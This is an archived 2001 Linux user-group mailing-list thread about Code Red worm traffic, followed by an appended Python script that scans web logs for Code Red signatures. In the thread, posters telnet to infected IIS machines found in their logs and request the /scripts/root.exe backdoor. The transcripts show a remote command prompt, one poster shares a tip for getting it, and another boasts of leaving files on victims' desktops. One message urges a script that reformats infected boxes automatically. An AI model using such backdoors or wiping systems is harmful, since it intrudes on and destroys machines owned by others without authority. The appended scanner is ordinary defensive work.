CR worm infection attempts

Jason plug-discuss@lists.PLUG.phoenix.az.us
Thu, 23 Aug 2001 23:23:10 +0000


Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx).
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 23 Aug 2001 22:34:30 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>cd \



--

Then nothing. I reconnected, got the exact same results. The command
"DIR" doesn't work either. Perhaps I'm grossly misunderstanding
something, but it doesn't seem like it's actually compromised - nothing
will run. I don't think the machine is greatly overloaded either, given
how rapidly it responds to an attempt to reconnect.

Or perhaps there is some new toolkit out there that is killing
processes named root.exe. It's hard to say. That one particular box
attempted to install Code Red on my own machine several times.

Perhaps someone should write a script that examines logs and then
automatically euthanizes any Code Red box with a full reformat. While
this may seem harsh, keep in mind said box is currently infecting
anything else it can - if people can lose their freedom and property
for this "crime", then surely reformatting is a just response to a
device doing so, particularly if it stops said action. If a car was
running over children in a parking lot, out of control all "Christine"
like, no one would be too upset if someone rolled over it with a tank.

That's what backups are for, right? You did make backups, didn't you?

If they're using M$ products and aren't making backups, they deserve
what's coming to them anyways. Fuck 'em if they can't take a joke
anyways LOL.

Kim Allen wrote:
> 
> I've been contacting the sites that my server logs show have been
> hitting me with the Code Red signature, and so far no one has bothered to
> respond except for one. However, that site has told me how secure they are
> and how there is no way that they have any problems. When I sent them the
> portions of my server logs showing they do have a problem, they threatened
> legal action. Has anyone else had this type of response?
> 
> > To answer your question... make sure you're hitting enter TWICE after
> > the command.
> >
> > As a security guy myself, I'm deeply troubled by what I'm finding.
> > Check it out:
> >
> > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> > Trying xxx.xxx.xxx.xxx...
> > Connected to xxx.xxx.xxx.xxx.
> > Escape character is '^]'.
> > GET /scripts/root.exe HTTP/1.0
> >
> > HTTP/1.1 200 OK
> > Server: Microsoft-IIS/5.0
> > Date: Mon, 06 Aug 2001 04:22:13 GMT
> > Content-Type: application/octet-stream
> > Microsoft Windows 2000 [Version 5.00.2195]
> > (C) Copyright 1985-1999 Microsoft Corp.
> >
> > c:\inetpub\scripts>
> >
> > From here, I've been leaving a nice text file on \\ALL USERS\\ desktops
> > that explains how I did it, and why they need to pay attention to
> > security patches. :)
> >
> > Hopefully they won't take it the 'wrong' way.
> >
> > ~g~
> >
> > On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > > Wayne Conrad wrote:
> > > >
> > > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > > I got tired of counting and just started putting the info into my IDS page.
> > > > > That way I can send complaints and point them to a URL so I don't have to
> > > > > keep recreating the same data each time.
> > > >
> > > > Are you putting the IPs up too?  Every one of the CRII infected boxes is rooted...  I wonder about the goodness of publishing a list of known rooted boxes.
> > > >     Wayne
> > > ________________________________________________
> > >
> > > I've been trying that out
> > >
> > > telnet ipaddress_from_my_httpd_access_log 80
> > >
> > > GET /scripts/root.exe HTTP/1.0
> > >
> > > but I can't get a command prompt - what am I missing?
> > >
> > > Craig
> > > ________________________________________________
> > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> > >
> > > PLUG-discuss mailing list  -  PLUG-discuss@lists.PLUG.phoenix.az.us
> > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> > >
> >

-- 
jkenner @ mindspring . com__
I Support Linux:           _> _  _ |_  _  _     _|
Working Together To       <__(_||_)| )| `(_|(_)(_|
To Build A Better Future.       |                   <s>
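A defender-side log check for the signature Kim Allen and J.Francois describe, added here as an example and not code from this thread: it parses NCSA/Apache common-format access log lines, flags the /scripts/root.exe request shown above (plus two well-known Code Red indicators that are not on this page), and tallies hits per source address so a complaint can cite them. The sample log lines and addresses are constructed.

```python
import re
from collections import defaultdict

# NCSA common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# /scripts/root.exe is the backdoor probed in the thread. The /MSADC copy
# and the /default.ida probe are well-known Code Red indicators added here.
SIGNATURES = {
    "root.exe backdoor (/scripts)": re.compile(r"^/scripts/root\.exe", re.I),
    "root.exe backdoor (/MSADC)": re.compile(r"^/msadc/root\.exe", re.I),
    "Code Red .ida probe": re.compile(r"^/default\.ida\?", re.I),
}

def classify(path):
    """Return the matching signature name, or None for ordinary traffic."""
    for name, rx in SIGNATURES.items():
        if rx.search(path):
            return name
    return None

def parse_line(line):
    """Return the log fields as a dict, or None if the line is malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def scan(log_text):
    """Map source IP -> {signature: count} over every Code Red hit."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue  # tolerate junk lines instead of aborting the scan
        sig = classify(rec["path"])
        if sig:
            hits[rec["ip"]][sig] += 1
    return {ip: dict(sigs) for ip, sigs in hits.items()}

# Constructed sample log (RFC 5737 test addresses, not real hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [23/Aug/2001:22:34:30 +0000] "GET /default.ida?XXXXXXXXXXXX HTTP/1.0" 404 275
192.0.2.10 - - [23/Aug/2001:22:34:31 +0000] "GET /scripts/root.exe HTTP/1.0" 404 286
198.51.100.7 - - [23/Aug/2001:22:35:02 +0000] "GET /index.html HTTP/1.1" 200 1024
192.0.2.10 - - [23/Aug/2001:22:36:11 +0000] "GET /MSADC/root.exe HTTP/1.0" 404 284
this line is deliberately malformed
"""

if __name__ == "__main__":
    for ip, sigs in scan(SAMPLE_LOG).items():
        print(ip, sigs)
```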